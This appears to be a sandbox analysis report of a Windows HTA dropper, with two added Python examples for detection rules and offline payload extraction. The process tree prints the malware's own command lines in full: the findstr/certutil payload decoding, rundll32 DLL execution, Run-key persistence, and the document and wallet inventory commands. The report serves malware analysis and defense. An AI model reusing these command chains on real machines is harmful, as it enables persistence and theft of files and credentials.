Analysis
max time kernel: 149s
max time network: 152s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 02/11/2024, 08:04
Static task: static1
Behavioral task: behavioral1
  Sample: bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
  Resource: win10v2004-20241007-en
General
Target: bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
Size: 70KB
MD5: 4b4622857d5a8049c8eabc65cbbf9759
SHA1: 3c0b1087394f1584a53ae19a60eeee26adf5323a
SHA256: bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234
SHA512: bd4e13fc189cff886ac5097814fb35145d897c8f3626df93ba1413fdb38117d3df48152fa099c3bfb4852760425bb97f07aa6020e61331580c7780604285cf9e
SSDEEP: 1536:qzp24Z02CaLYQZ3h+3vsA7gI8GLRMsQMIF9AbR0F:ErZFJYYx+fsAD8qqsQMIFKC
Malware Config
Signatures
Blocklisted process makes network request 2 IoCs
  flow 5  pid 2844  rundll32.exe
  flow 6  pid 2844  rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
  Run PowerShell and hide the display window.
  pid 1928  powershell.exe
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  Key opened: \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools  (rundll32.exe)
Loads dropped DLL 8 IoCs
  pid 2724  rundll32.exe  (4 loads)
  pid 2844  rundll32.exe  (4 loads)
Reads user/profile data of web browsers 3 TTPs
  Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  Key opened: \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts  (rundll32.exe)
Adds Run key to start application 2 TTPs 1 IoCs
  Set value (str): \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork"  (rundll32.exe)
Deobfuscate/Decode Files or Information 4 IoCs
  pid 2944  cmd.exe
  pid 3000  cmd.exe
  pid 2984  certutil.exe
  pid 2204  certutil.exe
UPX packed file (yara rule: upx) 11 IoCs
  resource                                                                       yara_rule
  behavioral1/files/0x0008000000016d13-32.dat                                    upx
  behavioral1/memory/2724-33-0x0000000000220000-0x000000000023F000-memory.dmp    upx
  behavioral1/memory/2844-53-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp    upx
  behavioral1/memory/2844-64-0x0000000180000000-0x0000000180127000-memory.dmp    upx
  behavioral1/memory/2844-67-0x0000000180000000-0x0000000180127000-memory.dmp    upx
  behavioral1/memory/2844-68-0x0000000180000000-0x0000000180127000-memory.dmp    upx
  behavioral1/memory/2844-118-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp   upx
  behavioral1/memory/2844-121-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp   upx
  behavioral1/memory/2844-134-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp   upx
  behavioral1/memory/2844-139-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp   upx
  behavioral1/memory/2844-140-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp   upx
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
  Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
  File opened (read-only): \??\VBoxMiniRdrDN  (rundll32.exe)
Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by findstr.exe, certutil.exe, rundll32.exe, mshta.exe, cmd.exe, cmd.exe, findstr.exe, certutil.exe, NOTEPAD.EXE
Modifies Internet Explorer settings 1 IoCs
  Key created: \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main  (mshta.exe)
Opens file in notepad (likely ransom note) 1 IoCs
  pid 2604  NOTEPAD.EXE
  The file opened is C:\Users\Admin\AppData\Local\Temp\password.txt, which the dropper itself decodes out of the HTA with certutil (see the process tree). "Ransom note" is the sandbox's generic label for a text file shown in Notepad; the file's content is not reproduced in this report.
Suspicious behavior: EnumeratesProcesses 5 IoCs
  pid 2844  rundll32.exe  (4 events)
  pid 1928  powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
  Token: SeDebugPrivilege  pid 1928  powershell.exe
Suspicious use of WriteProcessMemory 60 IoCs
  source pid (Process)     -> target pid   procid_target   writes
  2496 (mshta.exe)         -> 2944         30              4
  2496 (mshta.exe)         -> 3000         32              4
  2944 (cmd.exe)           -> 2864         34              4
  3000 (cmd.exe)           -> 2756         35              4
  2944 (cmd.exe)           -> 2984         36              4
  3000 (cmd.exe)           -> 2204         37              4
  3000 (cmd.exe)           -> 2724         38              7
  2724 (rundll32.exe)      -> 2844         39              4
  2944 (cmd.exe)           -> 2604         40              4
  2844 (rundll32.exe)      -> 1928         42              3
  2844 (rundll32.exe)      -> 1828         44              3
  2844 (rundll32.exe)      -> 1732         46              3
  2844 (rundll32.exe)      -> 1260         48              3
  2844 (rundll32.exe)      -> 448          50              3
  2844 (rundll32.exe)      -> 2392         52              3
  2844 (rundll32.exe)      -> 2924         54              3
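The signatures above are the sandbox's view of one chain: mshta.exe runs cmd.exe, cmd.exe carves a base64 line out of the HTA with findstr and decodes it with certutil, rundll32 loads the resulting DLL from the user's AppData tree by bare file name, the DLL registers a Run key pointing back at itself, inventories documents and wallet files with dir, and zips a staging file with a hidden PowerShell. The same chain can be expressed as process-creation and registry-set rules for an EDR or SIEM. The following Python is an added example, not part of this report or of any product: the rule logic is mine, the sample events are constructed from the command lines and the Run key value shown in this report plus two benign control events, and the field names (pid, ppid, parent_image, image, cmdline, key, data) are assumed, not any particular vendor's schema. Note that .hwp is the Hangul Word Processor format and .egg/.alz are ALZip archive formats, so the inventory rule keys on those alongside the Office extensions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:          # assumed process-creation schema, not a vendor format
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


@dataclass
class RegSetEvent:        # assumed registry value-set schema
    pid: int
    image: str
    key: str
    data: str


def leaf(image):
    """Lower-case file name of an image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_mshta_certutil_decode(ev):
    # mshta.exe -> cmd.exe that carves a line out of a file with findstr and decodes it with certutil
    return (leaf(ev.parent_image) == "mshta.exe" and leaf(ev.image) == "cmd.exe"
            and "findstr" in ev.cmdline.lower()
            and re.search(r"certutil\s+-decode", ev.cmdline, re.I) is not None)


RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^\s,"]+\.dll),', re.I)


def rule_rundll32_unrooted_dll(ev):
    # rundll32 given a bare DLL name (resolved via the working directory and the DLL
    # search order, exactly what `cd /d ...AppData\Local & rundll32 netserv32.dll,MainWork`
    # relies on) or a DLL under the user-writable AppData tree
    if leaf(ev.image) != "rundll32.exe":
        return False
    m = RUNDLL_RE.search(ev.cmdline)
    if not m:
        return False
    dll = m.group("dll").lower()
    return "\\" not in dll or "\\appdata\\" in dll


def rule_hidden_powershell_archive(ev):
    c = ev.cmdline.lower()
    return (leaf(ev.image) == "powershell.exe"
            and re.search(r"-w(?:indowstyle)?\s+hidden", c) is not None
            and "compress-archive" in c)


DOC_EXTS = {".hwp", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".zip", ".rar", ".egg", ".txt", ".alz"}


def rule_document_inventory(ev):
    # `dir` over several document extensions or wallet patterns, appended to a log file
    c = ev.cmdline.lower()
    if leaf(ev.image) != "cmd.exe" or not re.search(r"\bdir\b", c) or ">>" not in c:
        return False
    exts = set(re.findall(r"\*(\.[a-z0-9]+)", c))
    return len(exts & DOC_EXTS) >= 3 or "*wallet*" in c or "utc--*" in c


RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)


def rule_run_key_rundll32_appdata(ev):
    d = ev.data.lower()
    return RUN_KEY_RE.search(ev.key) is not None and "rundll32" in d and "\\appdata\\" in d


PROC_RULES = [
    ("mshta_certutil_decode", rule_mshta_certutil_decode),
    ("rundll32_unrooted_dll", rule_rundll32_unrooted_dll),
    ("hidden_powershell_archive", rule_hidden_powershell_archive),
    ("document_inventory", rule_document_inventory),
]


def evaluate(proc_events, reg_events):
    """Return [(rule_name, pid), ...] for every event that matches a rule."""
    hits = [(name, ev.pid) for ev in proc_events for name, rule in PROC_RULES if rule(ev)]
    hits += [("run_key_rundll32_appdata", ev.pid) for ev in reg_events if rule_run_key_rundll32_appdata(ev)]
    return hits


# Constructed sample events, taken from this report's process tree, plus two benign controls.
HTA = r"C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
RUNDLL64 = r"C:\Windows\system32\rundll32.exe"
PROC_EVENTS = [
    ProcEvent(3000, 2496, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "'
              + HTA + r'">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork'),
    ProcEvent(2724, 3000, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\rundll32.exe", "rundll32 netserv32.dll,MainWork"),
    ProcEvent(1928, 2844, RUNDLL64, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"'),
    ProcEvent(1828, 2844, RUNDLL64, r"C:\Windows\system32\cmd.exe",
              r'cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.docx C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"'),
    ProcEvent(1732, 2844, RUNDLL64, r"C:\Windows\system32\cmd.exe",
              r'cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"'),
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir C:\Users\Admin\Documents\*.docx"),
    ProcEvent(101, 1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]
REG_EVENTS = [
    RegSetEvent(2844, RUNDLL64,
                r"\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network Service",
                r"rundll32 C:\Users\Admin\AppData\Local\netserv32.dll,MainWork"),
]

if __name__ == "__main__":
    for name, pid in evaluate(PROC_EVENTS, REG_EVENTS):
        print(f"{name}: pid {pid}")
```

The two control events show the intended precision: a plain `dir` without redirection to a log and a rundll32 call on a fully-qualified System32 DLL do not fire. The rundll32 rule is the one worth keeping even outside this sample, because a bare DLL name on a rundll32 command line always means the loaded module was chosen by the working directory, not by the operator.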
Processes
C:\Windows\SysWOW64\mshta.exe  PID 2496
  cmdline: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe  PID 2944
    cmdline: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\findstr.exe  PID 2864
      cmdline: findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\certutil.exe  PID 2984
      cmdline: certutil -decode -f 1.log password.txt
      - Deobfuscate/Decode Files or Information
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\NOTEPAD.EXE  PID 2604
      cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt
      - System Location Discovery: System Language Discovery
      - Opens file in notepad (likely ransom note)
  C:\Windows\SysWOW64\cmd.exe  PID 3000
    cmdline: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\findstr.exe  PID 2756
      cmdline: findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\certutil.exe  PID 2204
      cmdline: certutil -decode -f 1.log netserv32.dll
      - Deobfuscate/Decode Files or Information
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\rundll32.exe  PID 2724
      cmdline: rundll32 netserv32.dll,MainWork
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\rundll32.exe  PID 2844
        cmdline: rundll32 netserv32.dll,MainWork
        - Blocklisted process makes network request
        - Looks for VMWare Tools registry key
        - Loads dropped DLL
        - Accesses Microsoft Outlook accounts
        - Adds Run key to start application
        - Checks for VirtualBox DLLs, possible anti-VM trick
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 1928
          cmdline: powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\cmd.exe  PID 1828
          cmdline: cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
        C:\Windows\system32\cmd.exe  PID 1732
          cmdline: cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
        C:\Windows\system32\cmd.exe  PID 1260
          cmdline: cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
        C:\Windows\system32\cmd.exe  PID 448
          cmdline: cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
        C:\Windows\system32\cmd.exe  PID 2392
          cmdline: cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
        C:\Windows\system32\cmd.exe  PID 2924
          cmdline: cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

Two things in this tree are worth reading together with the signatures. First, the 32-bit rundll32 (PID 2724, SysWOW64) hands the same DLL to a 64-bit rundll32 (PID 2844, system32), and it is the 64-bit process that carries every network, registry, anti-VM and collection signature; the yara hits for PID 2844 at 0x180000000, the default image base for x64 DLLs, are consistent with that. Second, `rundll32 netserv32.dll,MainWork` names the DLL without a path, so it is found only because the preceding `cd /d C:\Users\Admin\AppData\Local` set the working directory; the Run key value later writes the absolute path so the persistence entry does not depend on the working directory.
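The two cmd.exe command lines in the tree carve both payloads straight out of the HTA: findstr /b prints only lines that begin with the given string, so each embedded payload sits on its own line and the marker is simply the base64 of its first bytes (TVqQAAMAAA decodes to the opening bytes of an MZ/DOS header; a2ZneGw7 decodes to the first six characters of the text file), and certutil -decode turns that single line back into a file. The same carving can be done offline without running the dropper. The following Python script is an added example, not part of this report or of the sample: the marker-to-filename mapping is taken from the command lines above, while SAMPLE_HTA, the fake DOS header and the decoy text are constructed stand-ins (the real HTA is not reproduced here).

```python
import base64
import binascii
import sys

# Marker -> output name, taken from the two findstr /b strings in the report.
# findstr /b only matches lines that BEGIN with the string, so each payload
# must sit on its own line and the marker is the base64 of its own first bytes.
MARKERS = {
    "TVqQAAMAAA": "netserv32.dll",   # base64 of b"MZ\x90\x00\x03\x00\x00\x00"...
    "a2ZneGw7": "password.txt",      # base64 of b"kfgxl;"...
}


def certutil_style_decode(line):
    """Approximate `certutil -decode`: strip whitespace, restore missing padding,
    discard characters outside the base64 alphabet. Returns None on failure."""
    s = "".join(line.split())
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=False)
    except binascii.Error:
        return None


def extract_payloads(hta_text, markers=MARKERS):
    """Return {output_name: bytes} for every line that starts with a known marker."""
    found = {}
    for line in hta_text.splitlines():
        for prefix, name in markers.items():
            if line.startswith(prefix):
                data = certutil_style_decode(line)
                if data is not None:
                    found[name] = data
    return found


def is_mz(data):
    """True when the blob starts with the MZ magic of a DOS/PE image."""
    return len(data) >= 2 and data[:2] == b"MZ"


def triage(hta_text):
    """Summarise what the dropper would write to disk: {name: (size, looks_like_pe)}."""
    return {name: (len(data), is_mz(data)) for name, data in extract_payloads(hta_text).items()}


# Constructed sample, not the real HTA: a 64-byte fake DOS header and a fake decoy note.
FAKE_DOS_HEADER = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 48
FAKE_NOTE = b"kfgxl; constructed decoy text, not the real password.txt"
SAMPLE_HTA = "\n".join([
    '<html><head><script language="VBScript">',
    "' constructed stand-in for the obfuscated dropper script",
    "</script></head><body></body></html>",
    base64.b64encode(FAKE_DOS_HEADER).decode(),
    base64.b64encode(FAKE_NOTE).decode(),
])

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HTA
    for name, (size, mz) in triage(text).items():
        print(f"{name}: {size} bytes, MZ header: {mz}")
```

Run it with the real HTA as the only argument; with no argument it runs on the constructed sample. Any decoded blob that starts with MZ should be hashed and matched against the dropped-file hashes in the Downloads section before it is loaded into a disassembler, and the same marker approach works for any dropper of this shape once you know the first bytes of the embedded file.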
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Defense Evasion
  Deobfuscate/Decode Files or Information (1)
  Modify Registry (2)
  Virtualization/Sandbox Evasion (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads
Filesize: 59KB
  MD5: 71593a662d03e58b27b29ab199a6d7b5
  SHA1: d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2
  SHA256: e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237
  SHA512: c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07
Filesize: 22B
  MD5: 2ac7510166832b4a6e4344f37d944578
  SHA1: c766dd5112d72620614842d4bf0e986c34c5a2d0
  SHA256: 09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad
  SHA512: ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a
Filesize: 14B
  MD5: 6a0e721cb89a06736206b91af92239cd
  SHA1: bb87db8bbcb512a584c45c80504fc21a0a972b3a
  SHA256: a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015
  SHA512: c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c
Filesize: 478KB
  MD5: de9438683614ccf3f0316139418985a9
  SHA1: dcbbfb18c16f4bf9025233e6ecf42be64c33932d
  SHA256: d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b
  SHA512: 925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470
Filesize: 139KB
  MD5: 6199c9d0ad1df4105c85ae041e833a0e
  SHA1: c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1
  SHA256: c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4
  SHA512: b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3
Filesize: 8KB
  MD5: 4c3a362b3f3e30e0d09cf23cf206d4f3
  SHA1: 8c83105c017fdd64b2bc094f295bfaa8ce074b39
  SHA256: 47efee3b0891b28c7ad69ba95c06f5fd2a45e0df0e4ec62307a24793a51b52bd
  SHA512: c78174e522de99a4774b764d0b465d8dc0035d4aa4e46a5306f3985afc814af0290c1af11b78c0656d6915b0ddc36ecc726a21666694ebecc87277120f9dfda4
Filesize: 9KB
  MD5: 38eb30a99834452a25809864e7116beb
  SHA1: 80271700c164e13a7a871d8530a71898bf4a64bc
  SHA256: 77062eba27314013f04f6a3aad6c6d60d5e2a9a9a289ea34fd83e87ccf9167b0
  SHA512: 48e013c5ca505310ee98f059c84fc619e1e41b03ab3fc9248688194e75eaa8a56bc7a6a68cb100c42115170b5791ba29d66ad381f2e4298660f0c72f8c4ed208
Filesize: 44KB
  MD5: 56d4fcfa7eb3a84740081264c5c0f10a
  SHA1: 06edf5464d2cfe1a75f3600c9039eabab97248bd
  SHA256: 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e
  SHA512: df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609